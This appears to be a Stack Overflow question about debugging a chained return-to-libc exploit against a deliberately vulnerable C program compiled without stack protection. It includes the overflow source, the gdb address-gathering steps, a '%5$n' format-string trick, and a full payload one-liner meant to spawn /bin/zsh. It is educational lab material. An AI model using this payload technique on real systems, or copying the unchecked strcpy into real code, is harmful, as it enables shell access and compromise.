# Chained Return2libc

Tags: c, buffer, buffer-overflow

I am trying to exploit below code using Chained ret2libc attack. I am trying to execute `execl('/bin/zsh','/bin/zsh',NULL)` function.

To write `NULL` at the 3rd argument of execl, I have used `printf(%5$n)`.

Code:

```
int main(int argc, char *argv[]){
    char buf[256];
    printf("%p",buf);           
    strcpy(buf, argv[1]);
}
```

To do this, I have exported 2 ENV variables such as:

```
user$ export SHELL='/bin/zsh'
user$ export test1='%5$n'
```

Then I compiled the program as below:

```
user$ gcc -ggdb -mpreferred-stack-boundry=2 -fno-stack-protector -fomit-frame-pointer -o vuln program.c
```

After that I opened this executable with gdb:

```
user$ gdb -q vuln 

gdb> break main
gdb> run test
gdb> STOPPED AT BREAKPOINT
gdb> print PRINTF --> got the address of this function
gdb> print EXECL --> got this address
gdb> print EXIT --> got this address too
```

To get the address of ENV variables, i ran

```
gdb> x/500s $esp --> kept pressing ENTER and got the address. I also got   the exact address of String '/bin/zsh' instead of address of 'SHELL=/bin/zsh' by adding 6. Similarly got the addres of '%5$n'.
```

To get the address of POP - RET inst, ran `objdump -D vuln | grep -A20 pop` --> got the address of one pop-ret instruction.

So input to the program looks like:

"A"*256+ printf_address + pop-ret address + '%5$n' address +execl address+ exit address+ '/bin/zsh' address + '/bin/zsh' address+ 3rd argument address.

I calculated 3rd argument address as base_address_of_buffer(printed by program)+256+28 (7 additional 4 bytes blocks)

But after running this program, it goes to execl and gives an error as below

Below is the input and output I am getting:

```
(gdb) run $(python -c 'print "A"*256+"\xa0\xb8\xe6\xb7"+"\x24\x85\x04\x08"+"\x54\xfe\xff\xbf"+"\x90\xa2\xed\xb7"+"\xf0\x1b\xe5\xb7"+"\x7e\xf5\xff\xbf"+"\x7e\xf5\xff\xbf"+"\x28\xf3\xff\xbf"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

    Starting program: /home/himmat/Desktop/vuln $(python -c 'print "A"*256+"\xa0\xb8\xe6\xb7"+"\x24\x85\x04\x08"+"\x54\xfe\xff\xbf"+"\x90\xa2\xed\xb7"+"\xf0\x1b\xe5\xb7"+"\x7e\xf5\xff\xbf"+"\x7e\xf5\xff\xbf"+"\x28\xf3\xff\xbf"')

Breakpoint 1, main (argc=2, argv=0xbffff284) at chained_ret2libc.c:14
14  {
(gdb) cont
Continuing.
process 3720 is executing new program: /bin/zsh4

Breakpoint 1, 0x08053443 in main ()
(gdb) cont
Continuing.
/bin/zsh: can't open input file: 
[Inferior 1 (process 3720) exited with code 0177]
(gdb)
```

[Error I am getting](https://i.stack.imgur.com/e1ygn.png)

To verify that all functions are being executed and 3rd argument is filled with NULL, refer below image.
[Execution of program](https://i.stack.imgur.com/prvcR.png)

Comment: Include the error you are getting in your question please.

Comment: You can find the error in second image. It says /bin/zsh: can't open input file: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..remaining_input_that_we_provided.

Comment: I mean include it as text, copy/paste it.

Comment: I have attached the error with the input. Input is a little bit changed because of ENVIRONMENT variable memory address got changed.